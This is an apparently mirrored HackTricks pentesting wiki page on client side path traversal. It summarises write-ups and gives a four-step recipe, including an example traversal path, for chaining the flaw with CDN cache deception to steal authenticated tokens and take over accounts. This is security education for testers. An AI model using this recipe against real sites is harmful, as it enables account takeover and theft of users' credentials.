maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/client-side-path-traversal.md
HackTricks News Bot 5123eccf6b Add content from: Cache Deception + CSPT: Turning Non Impactful Findings into ... 
- Remove searchindex.js (auto-generated file)
2025-09-14 01:22:37 +00:00

43 lines
3.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Client Side Path Traversal
{{#include ../banners/hacktricks-training.md}}
## Basic Information
A client side path traversal occurs when you can **manipulate the path of a URL** that is going to be **sent to a user to visit in a legit way** or that a user is somehow going to be **forced to visit for example via JS or CSS**.
- In [**this writeup**](https://erasec.be/blog/client-side-path-manipulation/), it was possible to **change the invite URL** so it would end up **canceling a card**.
- In [**this writeup**](https://mr-medi.github.io/research/2022/11/04/practical-client-side-path-traversal-attacks.html), it was possible to combine a **client side path traversal via CSS** (it was possible to change the path where a CSS resource was loaded from) with an **open redirect** to load the CSS resource from an **attacker controlled domain**.
- In [**this writeup**](https://blog.doyensec.com/2024/07/02/cspt2csrf.html), it's possible to see a tachnique on how to abuse CSPT **to perform a CSRF attack**. This is done by **monitoring all the data** that an attacker can control (URL path, parameters, fragment, adata injected in the DB...) **and the sinks** this data ends (requests being performed).
- Check [**this browser extension**](https://addons.mozilla.org/en-US/firefox/addon/eval-villain/) to monitor that.
- Check this [**CSPT playground**](https://github.com/doyensec/CSPTPlayground) to try the technique.
- Check [**this tutorial**](https://blog.doyensec.com/2024/12/03/cspt-with-eval-villain.html) on how to use the browser extension in the playground.
## CSPT-assisted web cache poisoning/deception
CSPT can be chained with extension-based CDN caching to exfiltrate sensitive JSON leaked by authenticated API calls:
- A frontend concatenates user-controlled input into an API path and attaches authentication headers in fetch/XHR.
- By injecting dot-segments (../) you can retarget the authenticated request to a different endpoint on the same origin.
- If that endpoint (or a path variant with a static-looking suffix like .css) is cached by the CDN without varying on auth headers, the victims authenticated response can be stored under a public cache key and retrieved by anyone.
Quick recipe:
1) Find SPA code building API URLs from path parameters while sending auth headers.
2) Identify sensitive endpoints and test static suffixes (.css, .js, .jpg, .json) to see if the CDN flips to Cache-Control: public/max-age and X-Cache: Hit while returning JSON.
3) Lure the victim to a URL that injects traversal into the SPA parameter so the authenticated fetch hits the cacheable path variant (for example, ../../../v1/token.css).
4) Read back the same URL anonymously to obtain the cached secret (token → ATO).
See details and mitigations in the Cache Deception page: [Cache Poisoning and Cache Deception](cache-deception/).
## References
- [Cache Deception + CSPT: Turning Non Impactful Findings into Account Takeover](https://zere.es/posts/cache-deception-cspt-account-takeover/)
- [CSPT overview by Matan Berson](https://matanber.com/blog/cspt-levels/)
- [PortSwigger: Web Cache Deception](https://portswigger.net/web-security/web-cache-deception)
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink